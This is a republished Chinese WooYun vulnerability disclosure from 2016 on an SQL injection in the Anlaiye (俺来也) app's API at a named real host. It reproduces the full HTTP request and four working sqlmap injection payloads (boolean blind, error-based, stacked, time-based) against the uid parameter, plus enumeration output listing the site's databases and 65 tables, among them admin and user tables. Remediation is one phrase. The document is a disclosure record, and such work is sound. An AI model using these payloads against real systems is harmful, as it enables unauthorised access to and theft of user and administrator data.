俺来也APP存在SQL注入漏洞

admin
admin
admin
140488
文章
117
评论
2017年3月28日20:06:52评论307 views字数 216阅读0分43秒阅读模式
摘要

2016-03-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-07: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(0) 关注此漏洞

缺陷编号: WooYun-2016-187907

漏洞标题: 俺来也APP存在SQL注入漏洞

相关厂商: 俺来也

漏洞作者: seeicb

提交时间: 2016-03-23 12:15

公开时间: 2016-05-07 12:15

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+数字类型注射

0人收藏

漏洞详情

披露状态:

2016-03-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

code 区域 
POST /api/ HTTP/1.1
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 149
 Host: c.anlaiye.com.cn
 Connection: Keep-Alive
 User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; M463C Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
 Accept-Encoding: gzip
 
 uid=1278123&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d118ef8e741184739280
code 区域 
Parameter: uid (POST)
     Type: boolean-based blind
     Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
     Payload: uid=-2941') OR 8266=8266#&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d17fd1ef8e74002b7739280
 
     Type: error-based
     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
     Payload: uid=12780241') AND (SELECT 1177 FROM(SELECT COUNT(*),CONCAT(0x716b717a71,(SELECT (ELT(1177=1177,1))),0x7171786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('aVyk' LIKE 'aVyk&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d17fd1ef8e74002b7739280
 
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: uid=12780241');(SELECT * FROM (SELECT(SLEEP(5)))zrJf)#&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d17fd1ef8e74002b7739280
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: uid=12780241') AND (SELECT * FROM (SELECT(SLEEP(5)))ZOGq) AND ('JRDn' LIKE 'JRDn&class=AddSignUpInformation&app=Cas&phone=123456789&nickname=asd&sign=2fdbaa494d17fd1ef8e74002b7739280
 ---
 web application technology: PHP 5.4.35
 back-end DBMS: MySQL 5.0
 sqlmap resumed the following injection point(s) from stored session:

漏洞证明:

code 区域 
available databases [5]:
 [*] anlaiye
 [*] information_schema
 [*] mysql
 [*] performance_schema
 [*] test

+-------------------------------+

code 区域 
Database: anlaiye
 [65 tables]
 +-------------------------------+
 | admin_app                     |
 | admin_token                   |
 | admin_user                    |
 | admin_user_group              |
 | admin_user_permission         |
 | advert_board                  |
 | advert_content                |
 | advert_page                   |
 | bts_financing_order           |
 | bts_order                     |
 | cas_click                     |
 | cas_flow                      |
 | cas_login_error               |
 | cas_login_log                 |
 | cas_thirdinfo                 |
 | cas_user                      |
 | cas_user_consignee            |
 | cas_user_detail               |
 | cas_user_education_experience |
 | cas_user_favorite             |
 | cas_user_lv                   |
 | cas_user_lv_back              |
 | cas_user_photo                |
 | cas_user_share                |
 | cas_user_work_experience      |
 | comment_content               |
 | company_detail                |
 | company_position_relation     |
 | company_report_detail         |
 | company_resume_relation       |
 | exchange_information          |
 | forbidden_account             |
 | goods_attachment              |
 | goods_content                 |
 | goods_content_detail          |
 | goods_specification           |
 | innovation_category           |
 | innovation_comment            |
 | innovation_content            |
 | innovation_content_detail     |
 | message_content               |
 | message_remind                |
 | position_category             |
 | position_content              |
 | position_education            |
 | position_experience           |
 | resume_content                |
 | resume_job_status             |
 | score_company_detail          |
 | score_user_detail             |
 | search_position_history       |
 | search_resume_history         |
 | store_user                    |
 | system_frontend_menu          |
 | system_frontend_menu_copy     |
 | system_frontend_menu_group    |
 | system_navigation             |
 | tag_company_relation          |
 | tag_detail                    |
 | tag_user_relation             |
 | train_category                |
 | train_content                 |
 | train_content_detail          |
 | trend_attachment              |
 | trend_region                  |

修复方案:

加强过滤

版权声明:转载请注明来源 seeicb@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin